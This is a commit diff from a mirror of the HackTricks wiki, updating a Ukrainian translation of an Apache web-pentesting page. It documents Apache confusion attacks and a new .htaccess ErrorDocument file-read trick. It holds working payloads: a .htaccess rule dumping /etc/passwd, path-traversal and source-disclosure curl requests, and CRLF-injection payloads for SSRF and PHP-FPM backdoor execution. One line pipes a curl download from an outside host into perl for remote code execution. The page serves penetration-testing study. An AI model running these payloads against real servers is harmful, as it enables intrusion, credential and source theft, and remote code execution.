maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/network-services-pentesting/pentesting-web/apache.m

Browse Source
This commit is contained in:
Translator 2025-08-28 18:53:03 +00:00
parent c66ac3c3e9
commit 1fb51f50fb
2 changed files with 409 additions and 373 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

635
src/linux-hardening/privilege-escalation/README.md
View File

File diff suppressed because it is too large Load Diff

145
src/network-services-pentesting/pentesting-web/apache.md
View File

@ -2,13 +2,13 @@
{{#include ../../banners/hacktricks-training.md}}
## Виконувані PHP розширення
## Виконувані PHP-розширення
Перевірте, які розширення виконує сервер Apache. Щоб їх знайти, ви можете виконати:
Перевірте, які розширення виконує сервер Apache. Щоб їх знайти, виконайте:
```bash
grep -R -B1 "httpd-php" /etc/apache2
```
Також деякі місця, де ви можете знайти цю конфігурацію, це:
Також деякі місця, де ви можете знайти цю конфігурацію:
```bash
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
@ -21,19 +21,47 @@ curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Con
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
```
## LFI via .htaccess ErrorDocument file provider (ap_expr)
Якщо ви можете контролювати .htaccess каталогу і AllowOverride включає FileInfo для цього шляху, ви можете перетворити відповіді 404 у довільне читання локальних файлів, використовуючи функцію file() з ap_expr всередині ErrorDocument.
- Вимоги:
- Apache 2.4 з увімкненим парсером виразів (ap_expr) (за замовчуванням у 2.4).
- vhost/dir повинен дозволяти .htaccess встановлювати ErrorDocument (AllowOverride FileInfo).
- Користувач Apache, від імені якого працює процес, повинен мати права читання на цільовий файл.
.htaccess payload:
```apache
# Optional marker header just to identify your tenant/request path
Header always set X-Debug-Tenant "demo"
# On any 404 under this directory, return the contents of an absolute filesystem path
ErrorDocument 404 %{file:/etc/passwd}
```
Спрацьовує при запиті будь-якого неіснуючого шляху всередині цієї директорії, наприклад при зловживанні userdir-style hosting:
```bash
curl -s http://target/~user/does-not-exist | sed -n '1,20p'
```
Notes and tips:
- Працюють тільки абсолютні шляхи. Вміст повертається як тіло відповіді для 404 handler.
- Effective read permissions належать користувачу Apache (зазвичай www-data/apache). Ви не зможете прочитати /root/* або /etc/shadow у стандартних налаштуваннях.
- Навіть якщо .htaccess належить root, якщо батьківський каталог належить tenant і дозволяє перейменування, ви можете змогти перейменувати оригінальний .htaccess і завантажити власну заміну через SFTP/FTP:
- rename .htaccess .htaccess.bk
- put your malicious .htaccess
- Використовуйте це, щоб прочитати вихідний код додатку під DocumentRoot або vhost config paths для збору секретів (DB creds, API keys, тощо).
## Confusion Attack <a href="#a-whole-new-attack-confusion-attack" id="a-whole-new-attack-confusion-attack"></a>
Ці типи атак були представлені та задокументовані [**компанією Orange у цьому блозі**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1), і нижче наведено резюме. Атака "confusion" в основному зловживає тим, як десятки модулів, які працюють разом, створюючи Apache, не працюють ідеально синхронізовано, і змушуючи деякі з них змінювати деякі неочікувані дані може викликати вразливість у наступному модулі.
These types of attacks has been introduced and documented [**by Orange in this blog post**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) and the following is a summary. The "confusion" attack basically abuses how the tens of modules that work together creating a Apache don't work perfectly synchronised and making some of them modify some unexpected data can cause a vulnerability in a later module.
### Filename Confusion
#### Truncation
**`mod_rewrite`** обрізає вміст `r->filename` після символу `?` ([_**modules/mappers/mod_rewrite.c#L4141**_](https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L4141)). Це не зовсім неправильно, оскільки більшість модулів буде розглядати `r->filename` як URL. Але в інших випадках це буде розглядатися як шлях до файлу, що може викликати проблему.
The **`mod_rewrite`** will trim the content of `r->filename` after the character `?` ([_**modules/mappers/mod_rewrite.c#L4141**_](https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L4141)). This isn't totally wrong as most modules will treat `r->filename` as an URL. But in other occasions this will be treated as file path, which would cause a problem.
- **Path Truncation**
Можна зловживати `mod_rewrite`, як у наступному прикладі правила, щоб отримати доступ до інших файлів у файловій системі, видаляючи останню частину очікуваного шляху, просто додавши `?`:
It's possible to abuse `mod_rewrite` like in the following rule example to access other files inside the file system, removing the last part of the expected path adding simply a `?`:
```bash
RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"
@ -46,9 +74,9 @@ curl http://server/user/orange
curl http://server/user/orange%2Fsecret.yml%3F
# the output of file `/var/user/orange/secret.yml`
```
- **Помилкове призначення RewriteFlag**
- **Mislead RewriteFlag Assignment**
У наступному правилі переписування, поки URL закінчується на .php, він буде оброблятися та виконуватися як php. Тому можливо надіслати URL, який закінчується на .php після символу `?`, завантажуючи при цьому в шлях інший тип файлу (наприклад, зображення) з шкідливим php-кодом всередині:
У наступному правилі перепису, доки URL закінчується на .php, воно буде трактуватися й виконуватися як php. Тому можна відправити URL, що закінчується на .php після символу `?`, підвантаживши в шляху файл іншого типу (наприклад, зображення) з шкідливим php-кодом всередині:
```bash
RewriteEngine On
RewriteRule ^(.+\.php)$ $1 [H=application/x-httpd-php]
@ -63,7 +91,7 @@ curl http://server/upload/1.gif%3fooo.php
```
#### **ACL Bypass**
Можливо отримати доступ до файлів, до яких користувач не повинен мати доступ, навіть якщо доступ має бути заборонений з такими конфігураціями:
Можна отримати доступ до файлів, до яких користувач не повинен мати доступ, навіть якщо доступ має бути заборонений при конфігураціях, таких як:
```xml
<Files "admin.php">
AuthType Basic
@ -72,20 +100,20 @@ AuthUserFile "/etc/apache2/.htpasswd"
Require valid-user
</Files>
```
Це пов'язано з тим, що за замовчуванням PHP-FPM отримуватиме URL-адреси, що закінчуються на `.php`, такі як `http://server/admin.php%3Fooo.php`, і оскільки PHP-FPM видалить усе після символу `?`, попередня URL-адреса дозволить завантажити `/admin.php`, навіть якщо попереднє правило забороняло це.
Це відбувається тому, що за замовчуванням PHP-FPM отримує URL, що закінчуються на `.php`, наприклад `http://server/admin.php%3Fooo.php`, і оскільки PHP-FPM видаляє все після символу `?`, попередній URL дозволить завантажити `/admin.php`, навіть якщо попереднє правило це забороняло.
### DocumentRoot Confusion
### Плутанина з DocumentRoot
```bash
DocumentRoot /var/www/html
RewriteRule ^/html/(.*)$ /$1.html
```
Цікава деталь про Apache полягає в тому, що попередній перепис намагатиметься отримати доступ до файлу як з documentRoot, так і з кореня. Отже, запит до `https://server/abouth.html` перевірить наявність файлу в `/var/www/html/about.html` та `/about.html` у файловій системі. Це, по суті, може бути використано для доступу до файлів у файловій системі.
Цікавий факт про Apache: попередній rewrite намагатиметься звернутися до файлу як із documentRoot, так і з root. Тому запит до `https://server/abouth.html` перевірить наявність файлу в `/var/www/html/about.html` та `/about.html` у файловій системі. Це, по суті, може бути використано для доступу до файлів у файловій системі.
#### **Розкриття вихідного коду на стороні сервера**
- **Розкрити вихідний код CGI**
- **Розкриття вихідного коду CGI**
Просто додавання %3F в кінці достатньо, щоб розкрити вихідний код модуля cgi:
Достатньо додати %3F наприкінці, щоб leak вихідний код CGI-модуля:
```bash
curl http://server/cgi-bin/download.cgi
# the processed result from download.cgi
@ -97,60 +125,60 @@ curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
```
- **Розкриття вихідного коду PHP**
Якщо сервер має різні домени, один з яких є статичним доменом, це можна використати для обходу файлової системи та витоку коду php:
Якщо сервер має кілька доменів, і один із них — статичний домен, цим можна зловживати для обходу файлової системи та leak php code:
```bash
# Leak the config.php file of the www.local domain from the static.local domain
curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
# the source code of config.php
```
#### **Маніпуляція локальними гаджетами**
#### **Local Gadgets Manipulation**
Головна проблема з попередньою атакою полягає в тому, що за замовчуванням більшість доступу до файлової системи буде заборонено, як у [шаблоні конфігурації](https://github.com/apache/httpd/blob/trunk/docs/conf/httpd.conf.in#L115) Apache HTTP Server:
Основна проблема попередньої атаки полягає в тому, що за замовчуванням більшість доступів до файлової системи буде заборонено, як у Apache HTTP Servers [configuration template](https://github.com/apache/httpd/blob/trunk/docs/conf/httpd.conf.in#L115):
```xml
<Directory />
AllowOverride None
Require all denied
</Directory>
```
Однак, операційні системи [Debian/Ubuntu](https://sources.debian.org/src/apache2/2.4.62-1/debian/config-dir/apache2.conf.in/#L165) за замовчуванням дозволяють `/usr/share`:
Однак, [Debian/Ubuntu](https://sources.debian.org/src/apache2/2.4.62-1/debian/config-dir/apache2.conf.in/#L165) операційні системи за замовчуванням дозволяють `/usr/share`:
```xml
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
```
Отже, було б можливим **зловживати файлами, розташованими всередині `/usr/share` в цих дистрибутивах.**
Отже, буде можливо **зловживати файлами, розташованими всередині `/usr/share` в цих дистрибутивах.**
**Локальний гаджет для розкриття інформації**
**Local Gadget to Information Disclosure**
- **Apache HTTP Server** з **websocketd** може відкрити скрипт **dump-env.php** за адресою **/usr/share/doc/websocketd/examples/php/**, що може призвести до витоку чутливих змінних середовища.
- Сервери з **Nginx** або **Jetty** можуть розкрити чутливу інформацію веб-додатків (наприклад, **web.xml**) через свої стандартні веб-корені, розташовані під **/usr/share**:
- **Apache HTTP Server** з **websocketd** може виставляти скрипт **dump-env.php** у **/usr/share/doc/websocketd/examples/php/**, який може привести до leak чутливих змінних середовища.
- Сервери з **Nginx** або **Jetty** можуть виставляти чутливу інформацію веб-додатків (наприклад, **web.xml**) через їхні стандартні web-корені, розміщені під **/usr/share**:
- **/usr/share/nginx/html/**
- **/usr/share/jetty9/etc/**
- **/usr/share/jetty9/webapps/**
**Локальний гаджет для XSS**
**Local Gadget to XSS**
- На Ubuntu Desktop з **встановленим LibreOffice**, експлуатація функції перемикання мови довідкових файлів може призвести до **Cross-Site Scripting (XSS)**. Маніпулювання URL за адресою **/usr/share/libreoffice/help/help.html** може перенаправити на шкідливі сторінки або старі версії через **небезпечне правило переписування**.
- На Ubuntu Desktop з встановленим **LibreOffice**, експлуатація функції переключення мови у файлах довідки може привести до **Cross-Site Scripting (XSS)**. Маніпулювання URL на **/usr/share/libreoffice/help/help.html** може перенаправити на шкідливі сторінки або старі версії через **unsafe RewriteRule**.
**Локальний гаджет для LFI**
**Local Gadget to LFI**
- Якщо встановлені PHP або певні фронтенд-пакети, такі як **JpGraph** або **jQuery-jFeed**, їх файли можуть бути використані для читання чутливих файлів, таких як **/etc/passwd**:
- Якщо встановлено PHP або певні фронтенд-пакети, як-от **JpGraph** або **jQuery-jFeed**, їхні файли можуть бути використані для читання чутливих файлів, наприклад **/etc/passwd**:
- **/usr/share/doc/libphp-jpgraph-examples/examples/show-source.php**
- **/usr/share/javascript/jquery-jfeed/proxy.php**
- **/usr/share/moodle/mod/assignment/type/wims/getcsv.php**
**Локальний гаджет для SSRF**
**Local Gadget to SSRF**
- Використовуючи **magpie_debug.php** з **MagpieRSS** за адресою **/usr/share/php/magpierss/scripts/magpie_debug.php**, можна легко створити вразливість SSRF, що надає доступ до подальших експлойтів.
- Використовуючи **MagpieRSS's magpie_debug.php** у **/usr/share/php/magpierss/scripts/magpie_debug.php**, легко створити SSRF-вразливість, що дає шлях до подальших експлойтів.
**Локальний гаджет для RCE**
**Local Gadget to RCE**
- Можливості для **Remote Code Execution (RCE)** величезні, з вразливими установками, такими як застарілий **PHPUnit** або **phpLiteAdmin**. Їх можна експлуатувати для виконання довільного коду, демонструючи широкий потенціал маніпуляцій з локальними гаджетами.
- Можливості для **Remote Code Execution (RCE)** широкі — вразливі інсталяції, такі як застарілий **PHPUnit** або **phpLiteAdmin**, можна використати для виконання довільного коду, що демонструє великий потенціал маніпуляцій локальними гаджетами.
#### **Джейнбрейк з локальних гаджетів**
#### **Jailbreak from Local Gadgets**
Також можливо здійснити джейнбрейк з дозволених папок, слідуючи символічним посиланням, створеним встановленим програмним забезпеченням у цих папках, такими як:
Також можливо виконати jailbreak з дозволених папок, слідуючи симлінкам, створеним встановленим ПЗ у цих папках, наприклад:
- **Cacti Log**: `/usr/share/cacti/site/` -> `/var/log/cacti/`
- **Solr Data**: `/usr/share/solr/data/` -> `/var/lib/solr/data`
@ -158,55 +186,55 @@ Require all granted
- **MediaWiki Config**: `/usr/share/mediawiki/config/` -> `/var/lib/mediawiki/config/`
- **SimpleSAMLphp Config**: `/usr/share/simplesamlphp/config/` -> `/etc/simplesamlphp/`
Більше того, зловживаючи символічними посиланнями, було можливим отримати **RCE в Redmine.**
Крім того, зловживання симлінками дозволяло отримати **RCE in Redmine.**
### Handler Confusion <a href="#id-3-handler-confusion" id="id-3-handler-confusion"></a>
Цей напад експлуатує перетин функціональності між директивами `AddHandler` та `AddType`, які обидві можуть бути використані для **увімкнення обробки PHP**. Спочатку ці директиви впливали на різні поля (`r->handler` та `r->content_type` відповідно) у внутрішній структурі сервера. Однак, через застарілий код, Apache обробляє ці директиви взаємозамінно за певних умов, перетворюючи `r->content_type` на `r->handler`, якщо перше встановлено, а друге - ні.
Ця атака експлуатує накладання функціональності між директивами `AddHandler` і `AddType`, які обидві можуть бути використані для **увімкнення обробки PHP**. Спочатку ці директиви впливали на різні поля (`r->handler` та `r->content_type` відповідно) в внутрішній структурі сервера. Проте через застарілий код Apache обробляє ці директиви взаємозамінно за певних умов, перетворюючи `r->content_type` в `r->handler`, якщо перше встановлено, а друге — ні.
Більше того, в Apache HTTP Server (`server/config.c#L420`), якщо `r->handler` порожній перед виконанням `ap_run_handler()`, сервер **використовує `r->content_type` як обробник**, ефективно роблячи `AddType` та `AddHandler` ідентичними за ефектом.
Більше того, в Apache HTTP Server (`server/config.c#L420`), якщо `r->handler` порожній перед виконанням `ap_run_handler()`, сервер **використовує `r->content_type` як handler**, фактично роблячи `AddType` і `AddHandler` ідентичними за ефектом.
#### **Перезаписати обробник для розкриття PHP вихідного коду**
#### **Overwrite Handler to Disclose PHP Source Code**
У [**цьому виступі**](https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf) була представлена вразливість, де неправильний `Content-Length`, надісланий клієнтом, може призвести до того, що Apache помилково **поверне PHP вихідний код**. Це сталося через проблему обробки помилок з ModSecurity та Apache Portable Runtime (APR), де подвоєна відповідь призводить до перезапису `r->content_type` на `text/html`.\
Оскільки ModSecurity не обробляє належним чином значення повернення, він поверне PHP код і не інтерпретує його.
У [**цьому доповіді**](https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf) була показана вразливість, коли некоректний `Content-Length`, надісланий клієнтом, може призвести до того, що Apache помилково **поверне PHP-джерело**. Це сталося через проблему обробки помилок в ModSecurity і Apache Portable Runtime (APR), де подвійна відповідь призводить до перезапису `r->content_type` на `text/html`.\
Оскільки ModSecurity некоректно обробляє значення, він поверне PHP-код і не інтерпретує його.
#### **Перезаписати обробник для XXXX**
#### **Overwrite Handler to XXXX**
TODO: Orange ще не розкрив цю вразливість
### **Виклик довільних обробників**
### **Invoke Arbitrary Handlers**
Якщо зловмисник може контролювати заголовок **`Content-Type`** у відповіді сервера, він зможе **викликати довільні модульні обробники**. Однак, на момент, коли зловмисник контролює це, більшість процесу запиту буде завершено. Однак, можливо **перезапустити процес запиту, зловживаючи заголовком `Location`**, оскільки якщо **r**eturned `Status` дорівнює 200 і заголовок `Location` починається з `/`, відповідь обробляється як серверна редирекція і повинна бути оброблена.
Якщо атакуючий зможе контролювати заголовок **`Content-Type`** у відповіді сервера, він зможе **викликати довільні модульні обробники**. Однак до того моменту, коли атакуючий це контролює, більшість обробки запиту вже буде виконано. Проте можна **перезапустити процес запиту, зловживаючи заголовком `Location`**, оскільки якщо повернений `Status` 200 і заголовок `Location` починається з `/`, відповідь обробляється як Server-Side Redirection і має бути повторно оброблена.
Згідно з [RFC 3875](https://datatracker.ietf.org/doc/html/rfc3875) (специфікація про CGI) у [Розділі 6.2.2](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2) визначається поведінка локальної редирекції відповіді:
Відповідно до [RFC 3875](https://datatracker.ietf.org/doc/html/rfc3875) (специфікація про CGI) у [Section 6.2.2](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2) визначається поведінка Local Redirect Response:
> CGI-скрипт може повернути URI шлях і рядок запиту (local-pathquery) для локального ресурсу в заголовку Location. Це вказує серверу, що він повинен повторно обробити запит, використовуючи вказаний шлях.
> CGI script can return a URI path and query-string (local-pathquery) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.
Отже, для виконання цього нападу потрібна одна з наступних вразливостей:
Отже, для виконання цієї атаки потрібно одну з наступних вразливостей:
- CRLF Injection у заголовках відповіді CGI
- SSRF з повним контролем заголовків відповіді
- CRLF Injection в заголовках відповіді CGI
- SSRF із повним контролем над заголовками відповіді
#### **Довільний обробник для розкриття інформації**
#### **Arbitrary Handler to Information Disclosure**
Наприклад, `/server-status` повинен бути доступний лише локально:
Наприклад, `/server-status` має бути доступний лише локально:
```xml
<Location /server-status>
SetHandler server-status
Require local
</Location>
```
Можливо отримати доступ, встановивши `Content-Type` на `server-status` і заголовок Location, що починається з `/`
Можна отримати до нього доступ, встановивши `Content-Type` в `server-status` та заголовок Location, що починається з `/`
```
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a
```
#### **Випадковий обробник до повного SSRF**
#### **Arbitrary Handler to Full SSRF**
Перенаправлення до `mod_proxy` для доступу до будь-якого протоколу за будь-якою URL:
Перенаправлення до `mod_proxy` для доступу до будь-якого протоколу на будь-якому URL:
```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
@ -215,20 +243,20 @@ http://example.com/%3F
%0d%0a
%0d%0a
```
Однак заголовок `X-Forwarded-For` додається, що заважає доступу до кінцевих точок метаданих хмари.
Однак заголовок `X-Forwarded-For` додається, що перешкоджає доступу до кінцевих точок метаданих хмари.
#### **Довільний обробник для доступу до локального сокета Unix Domain**
#### **Довільний handler для доступу до локального Unix Domain Socket**
Доступ до локального сокета Unix Domain PHP-FPM для виконання PHP бекдору, розташованого в `/tmp/`:
Отримати доступ до локального Unix Domain Socket PHP-FPM для виконання PHP backdoor, розташованого в `/tmp/`:
```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a
```
#### **Випадковий обробник для RCE**
#### **Довільний обробник для RCE**
Офіційний [PHP Docker](https://hub.docker.com/_/php) образ включає PEAR (`Pearcmd.php`), інструмент управління пакетами PHP через командний рядок, який можна зловживати для отримання RCE:
Офіційний образ [PHP Docker](https://hub.docker.com/_/php) містить PEAR (`Pearcmd.php`) — інструмент управління PHP-пакетами з командного рядка, яким можна зловживати для отримання RCE:
```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}
@ -237,10 +265,13 @@ orange.tw/x|perl
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a
```
Перевірте [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), написаний [Phith0n](https://x.com/phithon_xg) для деталей цієї техніки.
Перегляньте [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), написану [Phith0n](https://x.com/phithon_xg), для деталей цієї техніки.
## Посилання
- [https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1)
- [Apache 2.4 Custom Error Responses (ErrorDocument)](https://httpd.apache.org/docs/2.4/custom-error.html)
- [Apache 2.4 Expressions and functions (file:)](https://httpd.apache.org/docs/2.4/expr.html)
- [HTB Zero write-up: .htaccess ErrorDocument LFI and cron pgrep abuse](https://0xdf.gitlab.io/2025/08/12/htb-zero.html)
{{#include ../../banners/hacktricks-training.md}}